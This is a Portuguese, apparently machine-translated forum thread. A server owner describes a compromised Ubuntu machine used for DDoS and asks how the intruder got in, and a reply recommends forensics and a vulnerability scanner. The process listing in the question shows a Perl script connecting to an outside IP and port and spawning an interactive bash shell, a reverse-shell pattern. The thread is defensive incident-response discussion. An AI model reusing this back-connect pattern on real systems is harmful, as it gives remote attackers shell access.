Eu tenho um servidor Ubuntu em execução. Hoje descobri que o servidor foi hackeado e está sendo usado para DDoS através de relatório de abuso da Amazon.
Encontrei as seguintes coisas no servidor.
Os seguintes arquivos suspeitos estão no servidor.
-rw-r--r-- 1 www-data www-data 759 Dec 21 15:38 weiwei.pl
-rwxrwxrwx 1 www-data www-data 1223123 Dec 26 02:20 huizhen
-rwxr-xr-x 1 www-data www-data 5 Jan 26 14:21 gates.lod
-rwxrwxrwx 1 www-data www-data 1135000 Jan 27 14:09 sishen
-rw-r--r-- 1 www-data www-data 759 Jan 27 14:36 weiwei.pl.5
-rw-r--r-- 1 www-data www-data 759 Jan 27 14:36 weiwei.pl.4
-rw-r--r-- 1 www-data www-data 759 Jan 27 14:36 weiwei.pl.3
-rw-r--r-- 1 www-data www-data 759 Jan 27 14:36 weiwei.pl.2
-rw-r--r-- 1 www-data www-data 759 Jan 27 14:36 weiwei.pl.1
-rwxr-xr-x 1 www-data www-data 5 Jan 28 14:00 vga.conf
-rw-r--r-- 1 www-data www-data 119 Jan 29 06:22 cmd.n
-rw-r--r-- 1 www-data www-data 73 Feb 1 01:01 conf.n
O seguinte processo estava em execução
www-data 8292 10629 0 Jan28 ? 00:00:00 perl /tmp/weiwei.pl 222.186.42.207 5222
www-data 8293 8292 0 Jan28 ? 00:00:00 /bin/bash -i
www-data 8293 8292 0 Jan28 ? 00:00:00 ./huizhen
Eu corri clamave ele excluiu /tmp/huizhenarquivos /tmp/sishen, mas os processos ainda estavam em execução weiwei.ple ./huizhenentão eu os matei manualmente.
Tenho os seguintes serviços em execução no servidor.
- SSH - Não usa a porta padrão 22, apenas autenticação de chave
- MongoDB – A porta está aberta para um grupo de segurança específico
- Memcache – A porta está aberta para um grupo de segurança específico
- NodeJS – A porta está aberta para um grupo de segurança específico
- Tomcat - portas 8080/8443 são públicas para webservice axis2 e solr
Minha suposição é que o hacker passou por alguma vulnerabilidade do Tomcat/axis2/solr porque o processo está sendo executado usando o mesmo grupo de usuários do Tomcat.
Bloqueei as portas 8080/8443 por enquanto e substituirei o servidor por um novo. O Tomcat estará acessível a partir de um servidor diferente através do nginx. Eu também instalei patches de segurança usandoatualizações autônomas.
O problema é como descobrir como o hacker entrou e plantou os trojans. Que outras medidas posso tomar para aumentar a segurança.
Responder1
Esta é uma pergunta bastante razoável. A rigor, sua melhor aposta para responder seria congelar o sistema e realizar testes forenses. Qualquer intervenção posterior de sua parte, incluindo a remoção de vírus, alterará e possivelmente apagará completamente qualquer migalha deixada pelo intruso.
Dado que este caminho não está mais aberto para você, o melhor é usar um Vulnerability Scanner, um programaou sejaprojetado exatamente para testar a resistência de sua instalação. Existem muitos, você pode apenas pesquisar o termo no Google Vulnerability Scanner, mas de longe o mais conhecido éNesso. Ele vem em diversas versões, desde gratuitas até pagas, com licenças diferentes, e pode se tornar bastante caro, possivelmente mais do que você está disposto a desembolsar.
No entanto, também existe uma versão gratuita, que vem pré-instalada noKaliLinux. Você terá que registrá-lo, embora seja totalmente gratuito. Muitos de nós usamos o Kali instalando-o em uma VM em um laptop e, em seguida, realizando testes de estresse fora de nossas casas, para ver quais defeitos (= vulnerabilidades conhecidas e não corrigidas, na maioria das vezes) são deixados nos aplicativos em execução em um Servidor voltado para a Internet.
Existem guias ensinando como usar isso em toda a Internet, e você também pode experimentá-lo em sua própria LAN (se confiar no seu firewall) e até mesmo no mesmo PC, se estiver executando o Kali como uma VM.